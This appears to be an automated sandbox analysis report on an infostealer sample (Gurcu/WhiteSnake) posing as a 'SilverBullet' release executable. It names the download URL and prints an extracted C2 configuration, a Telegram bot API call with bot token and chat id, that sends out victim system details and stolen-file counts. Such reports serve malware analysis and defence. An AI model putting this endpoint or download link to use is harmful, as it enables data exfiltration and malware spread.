General

  • Target

    https://github.com/ob2configmaker/SilverBullet/releases/download/v1.1.4/SilverBullet.v1.1.4.exe

  • Sample

    241010-qe4mpasekr

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7415374304:AAHSK5p8yXRUTkol4R8DEgb269Y0asZr8OQ/sendDocument?chat_id=-1002231908268&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20138.199.29.44%0ACountry:%20United%20Kingdom%0ACity:%20London%0APostal:%20SW1%0AISP:%20Datacamp%20Limited%20-%20A212238%0ATimezone:%20+01:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20Admin%0AOS:%20Microsoft%20Windows%2011%20Pro%0ACPU:%20Intel%20Core%20Processor%20(Broadwell)%0AGPU:%20Scheda%20video%20di%20base%20Microsoft%20(1280,%20720)%0AHWID:%20Unknown%0ACurrent%20Language:%20Italiano%20(Italia)%0AFileLocation:%20C:\Users\Admin\Downloads\dsada\SilverBullet.v1.1.4\bin\disesteemersokulkgn.exe%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20Unknown%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9D%8C%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%206%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0A%0A&parse_mode=HTM

Targets

    • Target

      https://github.com/ob2configmaker/SilverBullet/releases/download/v1.1.4/SilverBullet.v1.1.4.exe

    • Gurcu, WhiteSnake

      Gurcu is an information-stealing malware family written in C#.

    • Creates a large number of network flows

      This may indicate a network scan to discover remotely running services.

    • Contacts a large number (938) of remote hosts

      This may indicate a network scan to discover remotely running services.

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials and other sensitive information.

    • Unsecured Credentials: Credentials In Files

      Steals credentials from unsecured files.

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

MITRE ATT&CK Enterprise v15

Tasks